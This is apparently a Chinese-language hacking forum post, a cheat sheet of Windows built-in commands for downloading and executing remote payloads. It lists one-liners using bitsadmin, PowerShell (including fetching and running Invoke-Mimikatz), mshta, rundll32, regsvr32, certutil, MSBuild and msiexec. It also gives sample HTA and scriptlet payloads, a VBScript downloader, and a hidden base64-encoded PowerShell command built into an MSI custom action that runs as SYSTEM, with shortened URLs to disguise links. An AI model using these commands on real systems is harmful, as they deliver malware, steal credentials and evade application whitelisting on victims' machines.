taibeihacker
Moderator
1.bitsadmin命令(只能命令下载到指定路径上,win7以上):
bitsadmin /transfer myDownLoadJob /download /priority normal 'https://hackerninja.org/tu/atzsppzqibe24099.jpg' 'd:\abc.jpg'bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe%APPDATA%\d90f.exedel %APPDATA%\d90f.exe
2.powershell命名下载执行:(win7以上)
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m...it/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatzpowershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\111111111111111.exe’)
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('https://hackerninja.org/tu/atzsppzqibe24099.jpg','d:\\1.jpg')
3.mshta命令下载执行
mshta vbscript:Close(Execute('GetObject(''script:http://webserver/payload.sct'')'))mshta http://webserver/payload.hta ---短域名:http://sina.lt/--mshta http://t.cn/RYUQyF8
mshta \\webdavserver\folder\payload.hta
payload.hta
HTML
meta http-equiv='Content-Type' content='text/html; charset=utf-8'
HEAD
script language='VBScript'
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell=CreateObject('Wscript.Shell')
objShell.Run 'calc.exe'
self.close
/script
body
demo
/body
/HEAD
/HTML
4.rundll32命令下载执行
rundll32 \\webdavserver\folder\payload.dll,entrypointrundll32.exe javascript:'\.\mshtml,RunHTMLApplication';o=GetObject('script:http://webserver/payload.sct');window.close();
參考:https://github.com/3gstudent/Javascript-Backdoor
5.net中的regasm命令下载执行
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll6.cmd的远程命令下载:
cmd.exe /k \\webdavserver\folder\batchfile.txt7.regsvr32命令下载执行
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dllregsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:https://hackerninja.org/tu/tzctdlfzlnw24100.png scrobj.dll
js.png
?XML version='1.0'?
scriptlet
registration
progid='ShortJSRAT'
classid='{10001111-0000-0000-0000-0000FEEDACDC}'
!-- Learn from Casey Smith @subTee --
script language='JScript'
![CDATA[
ps='cmd.exe /c calc.exe';
new ActiveXObject('WScript.Shell').Run(ps,0,true);
]]
/script
/registration
/scriptlet
8.certutil命令下载执行
certutil -urlcache -split -f http://webserver/payload payloadcertutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -decode payload.b64 payload.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile=/LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -decode payload.b64 payload.exe payload.exe
certutil -urlcache -split -f http://site.com/a a.exe a.exe del a.exe certutil -urlcache -split -f http://192.168.254.102:80/a delete
9.net中的MSBulid命令下载执行
cmd /V /c 'set MB='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe' !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml payload.xml !MB! payload.xml'10. odbcconf命令下载执行
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}11.cscript脚本远程命令下载执行
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sctcscript //E:jscript \\webdavserver\folder\payload.txt
downfile.vbs:
' Set your settings
strFileURL='https://hackerninja.org/tu/2nprwsn0rah24106.jpg'
strHDLocation='c:\logo.jpg'
' Fetch the file
Set objXMLHTTP=CreateObject('MSXML2.XMLHTTP')
objXMLHTTP.open 'GET', strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status=200 Then
Set objADOStream=CreateObject('ADODB.Stream')
objADOStream.Open
objADOStream.Type=1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position=0'Set the stream position to the start
Set objFSO=Createobject('Scripting.FileSystemObject')
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO=Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream=Nothing
End if
Set objXMLHTTP=Nothing
將以上保存為downfile.vbs
輸入命令:cscript downfile.vbs
12.pubprn.vbs下载执行命令
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/...a47e4075785016a62f7e5170ef36f5247cdb/test.sct13.windows自带命令copy
copy \\x.x.x.x\xx\poc.exexcopy d:\test.exe \\x.x.x.x\test.exe
14. IEXPLORE.EXE命令下载执行(需要IE存在oday)
'C:\Program Files\Internet Explorer\IEXPLORE.EXE' http://site.com/exp15.IEEXC命令下载执行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ caspol -s offC:\Windows\Microsoft.NET\Framework\v2.0.50727\ IEExec http://site.com/files/test64.exe
參考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16. msiexec命令下载执行
msiexec /q /i https://hackerninja.org/tu/pp4bjvyet0l24111.png該方法我之前的兩篇文章《渗透测试中的msiexec》 《渗透技巧——从Admin权限切换到System权限》 有過介紹,細節不再贅述
首先將powershell實現下載執行的代碼作base64編碼:
$fileContent='(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe''
$bytes=[System.Text.Encoding]:Unicode.GetBytes($fileContent);
$encoded=[System.Convert]:ToBase64String($bytes);
$encoded
得到:
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBz AHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
完整powershell命令為:
powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBz AHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
完整wix文件為:
?xml version='1.0'?
Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'
Product Id='*' UpgradeCode='12345678-1234-1234-1234-111111111111' Name='Example Product
Name' Version='0.0.1' Manufacturer='@_xpn_' Language='1033'
Package InstallerVersion='200' Compressed='yes' Comments='Windows Installer Package'/
Media Id='1' /
Directory Id='TARGETDIR' Name='SourceDir'
Directory Id='ProgramFilesFolder'
Directory Id='INSTALLLOCATION' Name='Example'
Component Id='ApplicationFiles' Guid='12345678-1234-1234-1234-222222222222'
/Component
/Directory
/Directory
/Directory
Feature Id='DefaultFeature' Level='1'
ComponentRef Id='ApplicationFiles'/
/Feature
Property Id='cmdline'powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBz AHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
/Property
CustomAction Id='SystemShell' Execute='deferred' Directory='TARGETDIR'
ExeCommand='[cmdline]' Return='ignore' Impersonate='no'/
CustomAction Id='FailInstall' Execute='deferred' Script='vbscript' Return='check'
invalid vbs to fail install
/CustomAction
InstallExecuteSequence
Custom Action='SystemShell' After='InstallInitialize'/Custom
Custom Action='FailInstall' Before='InstallFiles'/Custom
/InstallExecuteSequence
/Product
/Wix
將其編譯,生成msi文件,命令如下:
candle.exe msigen.wix
light.exe msigen.wixobj
生成test.msi
实现功能:msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi
注:執行後需要手動結束進程msiexec.exe
結合百度提供的短地址服務(http://dwz.cn/), 實現代碼為34個字符,代碼如下:
msiexec /q /i http://dwz.cn/6UJpF8
17.下载命令执行项目GreatSCT
